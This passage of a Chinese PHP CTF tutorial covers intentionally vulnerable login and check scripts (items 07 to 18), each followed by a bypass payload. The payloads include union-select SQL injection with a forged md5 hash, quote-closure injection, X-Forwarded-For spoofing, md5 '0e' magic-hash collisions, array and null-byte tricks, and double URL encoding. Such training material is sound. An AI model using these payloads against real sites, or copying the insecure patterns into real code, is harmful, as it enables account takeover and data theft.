class="string">'password'</span>])) </div><div class="line">&#123;</div><div class="line">    var_dump($_GET[<span class="string">'name'</span>]);</div><div class="line">    <span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</div><div class="line">    var_dump($_GET[<span class="string">'password'</span>]);</div><div class="line">    var_dump(sha1($_GET[<span class="string">'name'</span>]));</div><div class="line">    var_dump(sha1($_GET[<span class="string">'password'</span>]));</div><div class="line">    <span class="keyword">if</span> ($_GET[<span class="string">'name'</span>] == $_GET[<span class="string">'password'</span>])</div><div class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Your password can not be your name!&lt;/p&gt;'</span>;</div><div class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (sha1($_GET[<span class="string">'name'</span>]) === sha1($_GET[<span class="string">'password'</span>]))</div><div class="line">      <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);</div><div class="line">    <span class="keyword">else</span></div><div class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Invalid password.&lt;/p&gt;'</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span></div><div class="line">    <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Login first!&lt;/p&gt;'</span>;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p>由于<code>sha1()</code>函数和<code>md5()</code>函数在处理传入参数为数组时会报警并都返回<code>NULL</code>，构造并传入2个不同数组便可以成功通过<code>if ($_GET[&#39;name&#39;] == $_GET[&#39;password&#39;])</code>和<code>else if (sha1($_GET[&#39;name&#39;]) === sha1($_GET[&#39;password&#39;]))</code>检测。</p><p><code>http://localhost/php_bugs/07.php?name[]=1&amp;password[]=2</code></p><p><img src="https://i.imgur.com/fR3MV3c.png" alt="SHA函数漏洞"></p><h2 id="08-SESSION验证绕过"><a href="#08-SESSION验证绕过" class="headerlink" title="08 SESSION验证绕过"></a>08 SESSION验证绕过</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line">&lt;html&gt;  </div><div class="line">&lt;head&gt;  </div><div class="line">    &lt;title&gt;Get flag&lt;/title&gt;</div><div class="line">&lt;/head&gt;  </div><div class="line">&lt;body&gt;  </div><div class="line"> </div><div class="line"><span class="meta">&lt;?php</span>  </div><div class="line">session_start();   </div><div class="line">  </div><div class="line"><span class="keyword">require</span> <span class="string">'flag.php'</span>;  </div><div class="line">  </div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) &#123;  </div><div class="line">    <span class="keyword">if</span> ($_GET[<span class="string">'password'</span>] == $_SESSION[<span class="string">'password'</span>])  </div><div class="line">        <span class="keyword">die</span> (<span class="string">'Flag: '</span>.$flag);  </div><div class="line">    <span class="keyword">else</span>  </div><div class="line">        <span class="keyword">print</span> <span class="string">'&lt;p class="alert"&gt;Wrong guess.&lt;/p&gt;'</span>;  </div><div class="line">&#125;  </div><div class="line">  </div><div class="line"><span class="comment">// Unpredictable seed  </span></div><div class="line">mt_srand((microtime() ^ rand(<span class="number">1</span>, <span class="number">10000</span>)) % rand(<span class="number">1</span>, <span class="number">10000</span>) + rand(<span class="number">1</span>, <span class="number">10000</span>));  </div><div class="line"><span class="meta">?&gt;</span>  </div><div class="line">  </div><div class="line">&lt;section class="login"&gt;    </div><div class="line">        &lt;ul class="list"&gt;  </div><div class="line">        <span class="meta">&lt;?php</span>  </div><div class="line">        <span class="keyword">for</span> ($i=<span class="number">0</span>; $i&lt;<span class="number">3</span>; $i++)  </div><div class="line">            <span class="keyword">print</span> <span class="string">'&lt;li&gt;'</span> . mt_rand (<span class="number">0</span>, <span class="number">0xffffff</span>) . <span class="string">'&lt;/li&gt;'</span>;  </div><div class="line">        $_SESSION[<span class="string">'password'</span>] = mt_rand (<span class="number">0</span>, <span class="number">0xffffff</span>);  </div><div class="line">        <span class="meta">?&gt;</span>  </div><div class="line">        &lt;/ul&gt;  </div><div class="line">  </div><div class="line">        &lt;form method=<span class="string">"get"</span>&gt;  </div><div class="line">                &lt;input type=<span class="string">"text"</span> required name=<span class="string">"password"</span> placeholder=<span class="string">"Next number"</span> /&gt;&lt;br/&gt;  </div><div class="line">                &lt;input type=<span class="string">"submit"</span>/&gt;  </div><div class="line">        &lt;/form&gt;  </div><div class="line">&lt;/section&gt;  </div><div class="line">&lt;/body&gt;  </div><div class="line">&lt;/html&gt;</div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>关键判断语句<code>if ($_GET[&#39;password&#39;] == $_SESSION[&#39;password&#39;])</code>，可以手动删除请求时的<code>cookies</code>，使<code>$_SESSION[&#39;password&#39;]</code>字段为<code>NULL</code>，并使传入<code>password</code>参数为<code>NULL</code>。</p><p><code>http://localhost/php_bugs/08.php?password=</code></p><p><img src="https://i.imgur.com/qWSB9h9.png" alt="SESSION验证绕过"></p><p><img src="https://i.imgur.com/Qs1Nv5D.png" alt="SESSION验证绕过"></p><p>资料：</p><ul><li><a href="http://blog.csdn.net/lymingha0/article/details/44079981" target="_blank" rel="external">【Writeup】Boston Key Party CTF 2015(部分题目)</a></li></ul><h2 id="09-密码md5比较绕过"><a href="#09-密码md5比较绕过" class="headerlink" title="09 密码md5比较绕过"></a>09 密码md5比较绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"><span class="comment">//配置数据库</span></div><div class="line"><span class="keyword">if</span>($_POST[user] &amp;&amp; $_POST[pass]) &#123;</div><div class="line">    $conn = mysql_connect(<span class="string">"localhost"</span>, <span class="string">"root"</span>, <span class="string">"root"</span>);</div><div class="line">    mysql_select_db(<span class="string">"test"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Could not select database"</span>);</div><div class="line">    <span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</div><div class="line">        <span class="keyword">die</span>(<span class="string">"Connection failed: "</span> . mysql_error($conn));</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="comment">//赋值</span></div><div class="line"></div><div class="line">$user = $_POST[user];</div><div class="line">$pass = md5($_POST[pass]);</div><div class="line"></div><div class="line"><span class="comment">//sql语句</span></div><div class="line"></div><div class="line">$sql = <span class="string">"select pwd from test where user='$user'"</span>;</div><div class="line">$query = mysql_query($sql);</div><div class="line"><span class="keyword">if</span> (!$query) &#123;</div><div class="line">    printf(<span class="string">"Error: %s\n"</span>, mysql_error($conn));</div><div class="line">    <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line">$row = mysql_fetch_array($query, MYSQL_ASSOC);</div><div class="line"></div><div class="line">  <span class="keyword">if</span> (($row[pwd]) &amp;&amp; (!strcasecmp($pass, $row[pwd]))) &#123;</div><div class="line"></div><div class="line"><span class="comment">//如果 str1 小于 str2 返回 &lt; 0； 如果 str1 大于 str2 返回 &gt; 0；如果两者相等，返回 0。</span></div><div class="line"></div><div class="line"></div><div class="line">    <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key:************** &lt;/p&gt;"</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;Log in failure!&lt;/p&gt;"</span>);</div><div class="line"></div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p><img src="https://i.imgur.com/wZObzv9.png" alt="密码md5比较绕过"></p><p><code>?user=&#39; union select &#39;e10adc3949ba59abbe56e057f20f883e&#39; #&amp;pass=123456</code></p><p>资料：</p><ul><li><a href="http://bobao.360.cn/ctf/learning/129.html" target="_blank" rel="external">DUTCTF-2015-Writeup</a></li></ul><h2 id="10-urldecode二次编码绕过"><a href="#10-urldecode二次编码绕过" class="headerlink" title="10 urldecode二次编码绕过"></a>10 urldecode二次编码绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>(eregi(<span class="string">"hackerDJ"</span>,$_GET[id])) &#123;</div><div class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;not allowed!&lt;/p&gt;"</span>);</div><div class="line">  <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line"></div><div class="line">$_GET[id] = urldecode($_GET[id]);</div><div class="line"><span class="keyword">if</span>($_GET[id] == <span class="string">"hackerDJ"</span>)</div><div class="line">&#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Access granted!&lt;/p&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;flag: &#123;*****************&#125; &lt;/p&gt;"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><code>h</code>的<code>URL</code>编码为：<code>%68</code>，二次编码为<code>%2568</code>，绕过</p><p><code>http://localhost/php_bugs/10.php?id=%2568ackerDJ</code></p><p>资料：</p><ul><li><a href="https://baike.baidu.com/item/URL%E7%BC%96%E7%A0%81/3703727?fr=aladdin" target="_blank" rel="external">URL编码表</a></li></ul><h2 id="11-sql闭合绕过"><a href="#11-sql闭合绕过" class="headerlink" title="11 sql闭合绕过"></a>11 sql闭合绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>($_POST[user] &amp;&amp; $_POST[pass]) &#123;</div><div class="line">    $conn = mysql_connect(<span class="string">"localhost"</span>, <span class="string">"root"</span>, <span class="string">"root"</span>);</div><div class="line">    mysql_select_db(<span class="string">"test"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Could not select database"</span>);</div><div class="line">    <span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</div><div class="line">        <span class="keyword">die</span>(<span class="string">"Connection failed: "</span> . mysql_error($conn));</div><div class="line">&#125; </div><div class="line">$user = $_POST[user];</div><div class="line">$pass = md5($_POST[pass]);</div><div class="line"></div><div class="line"><span class="comment">//exp:pass=1&amp;user=admin')#</span></div><div class="line"><span class="comment">//sql:select user from test where (user='admin')#</span></div><div class="line"></div><div class="line">$sql = <span class="string">"select user from test where (user='$user') and (pwd='$pass')"</span>;</div><div class="line"><span class="keyword">echo</span> $sql;</div><div class="line">$query = mysql_query($sql);</div><div class="line"><span class="keyword">if</span> (!$query) &#123;</div><div class="line">    printf(<span class="string">"Error: %s\n"</span>, mysql_error($conn));</div><div class="line">    <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line">$row = mysql_fetch_array($query, MYSQL_ASSOC);</div><div class="line"><span class="comment">//echo $row["pwd"];</span></div><div class="line">  <span class="keyword">if</span>($row[<span class="string">'user'</span>]==<span class="string">"admin"</span>) &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key: *********** &lt;/p&gt;"</span>;</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  <span class="keyword">if</span>($row[<span class="string">'user'</span>] != <span class="string">"admin"</span>) &#123;</div><div class="line">    <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;You are not admin!&lt;/p&gt;"</span>);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p>构造exp闭合绕过<br><code>pass=1&amp;user=admin&#39;)#</code></p><h2 id="12-X-Forwarded-For绕过指定IP地址"><a href="#12-X-Forwarded-For绕过指定IP地址" class="headerlink" title="12 X-Forwarded-For绕过指定IP地址"></a>12 X-Forwarded-For绕过指定IP地址</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetIP</span><span class="params">()</span></span>&#123;</div><div class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"HTTP_CLIENT_IP"</span>]))</div><div class="line">    $cip = $_SERVER[<span class="string">"HTTP_CLIENT_IP"</span>];</div><div class="line"><span class="keyword">else</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"HTTP_X_FORWARDED_FOR"</span>]))</div><div class="line">    $cip = $_SERVER[<span class="string">"HTTP_X_FORWARDED_FOR"</span>];</div><div class="line"><span class="keyword">else</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"REMOTE_ADDR"</span>]))</div><div class="line">    $cip = $_SERVER[<span class="string">"REMOTE_ADDR"</span>];</div><div class="line"><span class="keyword">else</span></div><div class="line">    $cip = <span class="string">"0.0.0.0"</span>;</div><div class="line"><span class="keyword">return</span> $cip;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$GetIPs = GetIP();</div><div class="line"><span class="keyword">if</span> ($GetIPs==<span class="string">"1.1.1.1"</span>)&#123;</div><div class="line"><span class="keyword">echo</span> <span class="string">"Great! Key is *********"</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span>&#123;</div><div class="line"><span class="keyword">echo</span> <span class="string">"错误！你的IP不在访问列表之内！"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p><code>HTTP</code>头添加<code>X-Forwarded-For:1.1.1.1</code></p><h2 id="13-md5加密相等绕过"><a href="#13-md5加密相等绕过" class="headerlink" title="13 md5加密相等绕过"></a>13 md5加密相等绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">$md51 = md5(<span class="string">'QNKCDZO'</span>);</div><div class="line">$a = @$_GET[<span class="string">'a'</span>];</div><div class="line">$md52 = @md5($a);</div><div class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($a))&#123;</div><div class="line"><span class="keyword">if</span> ($a != <span class="string">'QNKCDZO'</span> &amp;&amp; $md51 == $md52) &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"flag&#123;*****************&#125;"</span>;</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"false!!!"</span>;</div><div class="line">&#125;&#125;</div><div class="line"><span class="keyword">else</span>&#123;<span class="keyword">echo</span> <span class="string">"please input a"</span>;&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p><code>http://localhost/php_bugs/13.php?a=240610708</code></p><p><code>==</code>对比的时候会进行数据转换，根据PHP手册的描述：如果比较一个数字和字符串或者比较涉及到数字内容的字符串，则字符串会被转换为数值并且比较按照数值来进行。其中0e是科学计数法，因为涉及到数字内容，所以就会转换为数值，而<code>0e830400451993494058024219903391</code>转换为数值也就是<code>0*(10^830400451993494058024219903391) = 0</code>，因此只需找到生成的MD5值类似<code>0exxxxxxxxx</code>的字符串即可。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">md5(<span class="string">'240610708'</span>); <span class="comment">// 0e462097431906509019562988736854 </span></div><div class="line">md5(<span class="string">'QNKCDZO'</span>); <span class="comment">// 0e830400451993494058024219903391</span></div></pre></td></tr></table></figure><h2 id="14-intval函数向下取整"><a href="#14-intval函数向下取整" class="headerlink" title="14 intval函数向下取整"></a>14 intval函数向下取整</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>($_GET[id]) &#123;</div><div class="line">    $conn = mysql_connect(<span class="string">"localhost"</span>, <span class="string">"root"</span>, <span class="string">"root"</span>);</div><div class="line">    mysql_select_db(<span class="string">"test"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Could not select database"</span>);</div><div class="line">    <span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</div><div class="line">      <span class="keyword">die</span>(<span class="string">"Connection failed: "</span> . mysql_error($conn));</div><div class="line">    &#125;</div><div class="line">  $id = intval($_GET[id]);</div><div class="line">  <span class="keyword">echo</span> $id;</div><div class="line">  $query = @mysql_fetch_array(mysql_query(<span class="string">"select flag from ctf where id='$id'"</span>));</div><div class="line">  <span class="keyword">echo</span> $_GET[id];</div><div class="line">  <span class="keyword">if</span> ($_GET[id]==<span class="number">1024</span>) &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"&lt;p&gt;no! try again&lt;/p&gt;"</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span>&#123;</div><div class="line">    <span class="keyword">echo</span>($query[flag]);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><code>1024.1</code>绕过</p><p><strong>writeup</strong></p><p><img src="https://i.imgur.com/oVWI3yX.png" alt="intval函数"></p><p>资料：</p><ul><li><a href="http://blog.csdn.net/wangjian1012/article/details/51581564" target="_blank" rel="external">PHP intval()函数利用</a></li></ul><h2 id="15-strpos数组绕过NULL与ereg正则-00截断"><a href="#15-strpos数组绕过NULL与ereg正则-00截断" class="headerlink" title="15 strpos数组绕过NULL与ereg正则%00截断"></a>15 strpos数组绕过NULL与ereg正则%00截断</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">$flag = <span class="string">"flag"</span>;</div><div class="line"></div><div class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'nctf'</span>])) &#123;</div><div class="line">        <span class="keyword">if</span> (@ereg (<span class="string">"^[1-9]+$"</span>, $_GET[<span class="string">'nctf'</span>]) === <span class="keyword">FALSE</span>)</div><div class="line">            <span class="keyword">echo</span> <span class="string">'必须输入数字才行'</span>;</div><div class="line">        <span class="keyword">else</span> <span class="keyword">if</span> (strpos ($_GET[<span class="string">'nctf'</span>], <span class="string">'#biubiubiu'</span>) !== <span class="keyword">FALSE</span>)   </div><div class="line">            <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);</div><div class="line">        <span class="keyword">else</span></div><div class="line">            <span class="keyword">echo</span> <span class="string">'骚年，继续努力吧啊~'</span>;</div><div class="line">    &#125;</div><div class="line"></div><div class="line"> <span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><ul><li><p>方法一：<br>既要是纯数字,又要有<code>’#biubiubiu’</code>，<code>strpos()</code>找的是字符串,那么传一个数组给它,<code>strpos()</code>出错返回<code>null,null!==false</code>,所以符合要求.<br>所以输入<code>nctf[]=</code><br>那为什么<code>ereg()</code>也能符合呢?因为<code>ereg()</code>在出错时返回的也是<code>null</code>,<code>null!==false</code>,所以符合要求.</p></li><li><p>方法二：<br>字符串截断,利用<code>ereg()</code>的<code>NULL</code>截断漏洞，绕过正则过滤<br><code>http://localhost/php_bugs/16.php?nctf=1%00#biubiubiu</code> 错误<br>需将#编码<br><code>http://localhost/php_bugs/16.php?nctf=1%00%23biubiubiu</code><br>正确</p></li></ul><h2 id="16-SQL注入or绕过"><a href="#16-SQL注入or绕过" class="headerlink" title="16 SQL注入or绕过"></a>16 SQL注入or绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"><span class="comment">#GOAL: login as admin,then get the flag;</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"><span class="keyword">require</span> <span class="string">'db.inc.php'</span>;</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">clean</span><span class="params">($str)</span></span>&#123;</div><div class="line">    <span class="keyword">if</span>(get_magic_quotes_gpc())&#123; <span class="comment">//get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置</span></div><div class="line">        $str=stripslashes($str); <span class="comment">//返回一个去除转义反斜线后的字符串（\' 转换为 ' 等等）。双反斜线（\\）被转换为单个反斜线（\）。 </span></div><div class="line">    &#125;</div><div class="line">    <span class="keyword">return</span> htmlentities($str, ENT_QUOTES);</div><div class="line">&#125;</div><div class="line"></div><div class="line">$username = @clean((string)$_GET[<span class="string">'username'</span>]);</div><div class="line">$password = @clean((string)$_GET[<span class="string">'password'</span>]);</div><div class="line"></div><div class="line"><span class="comment">//$query='SELECT * FROM users WHERE name=\''admin\'\' AND pass=\''or 1 #'\';';</span></div><div class="line"></div><div class="line">$query=<span class="string">'SELECT * FROM users WHERE name=\''</span>.$username.<span class="string">'\' AND pass=\''</span>.$password.<span class="string">'\';'</span>;</div><div class="line">$result=mysql_query($query);</div><div class="line"><span class="keyword">if</span>(!$result || mysql_num_rows($result) &lt; <span class="number">1</span>)&#123;</div><div class="line">    <span class="keyword">die</span>(<span class="string">'Invalid password!'</span>);</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="keyword">echo</span> $flag;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$query='<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> <span class="keyword">name</span>=\<span class="string">''</span><span class="keyword">admin</span>\<span class="string">'\' AND pass=\''</span><span class="keyword">or</span> <span class="number">1</span> #<span class="string">'\';'</span>;</div></pre></td></tr></table></figure><p><code>?username=admin\&#39;\&#39; AND pass=\&#39;&#39;or 1 #&amp;password=</code></p><h2 id="17-密码md5比较绕过"><a href="#17-密码md5比较绕过" class="headerlink" title="17 密码md5比较绕过"></a>17 密码md5比较绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"><span class="keyword">if</span>($_POST[user] &amp;&amp; $_POST[pass]) &#123;</div><div class="line">   mysql_connect(SAE_MYSQL_HOST_M . <span class="string">':'</span> . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);</div><div class="line">  mysql_select_db(SAE_MYSQL_DB);</div><div class="line">  $user = $_POST[user];</div><div class="line">  $pass = md5($_POST[pass]);</div><div class="line">  $query = @mysql_fetch_array(mysql_query(<span class="string">"select pw from ctf where user=' $user '"</span>));</div><div class="line">  <span class="keyword">if</span> (($query[pw]) &amp;&amp; (!strcasecmp($pass, $query[pw]))) &#123;</div><div class="line"></div><div class="line">    <span class="comment">//strcasecmp:0 - 如果两个字符串相等</span></div><div class="line"></div><div class="line">      <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key: flag&#123;**************&#125; &lt;/p&gt;"</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;Log in failure!&lt;/p&gt;"</span>);</div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong><br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">//select pw from ctf where user=&apos;&apos;and 0=1 union select  &apos;e10adc3949ba59abbe56e057f20f883e&apos; #</div></pre></td></tr></table></figure><p></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">?user='and 0=1 union <span class="keyword">select</span>  <span class="string">'e10adc3949ba59abbe56e057f20f883e'</span> #&amp;pass=<span class="number">123456</span></div></pre></td></tr></table></figure><h2 id="18-md5-函数-使用数组绕过"><a href="#18-md5-函数-使用数组绕过" class="headerlink" title="18 md5()函数===使用数组绕过"></a>18 md5()函数===使用数组绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">$flag = <span class="string">'flag&#123;test&#125;'</span>;</div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'username'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>($_GET[<span class="string">'password'</span>])) &#123;</div><div class="line">    <span class="keyword">if</span> ($_GET[<span class="string">'username'</span>] == $_GET[<span class="string">'password'</span>])</div><div class="line">        <span class="keyword">print</span> <span class="string">'Your password can not be your username.'</span>;</div><div class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (md5($_GET[<span class="string">'username'</span>]) === md5($_GET[<span class="string">'password'</span>]))</div><div class="line">        <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);</div><div class="line">    <span class="keyword">else</span></div><div class="line">        <span 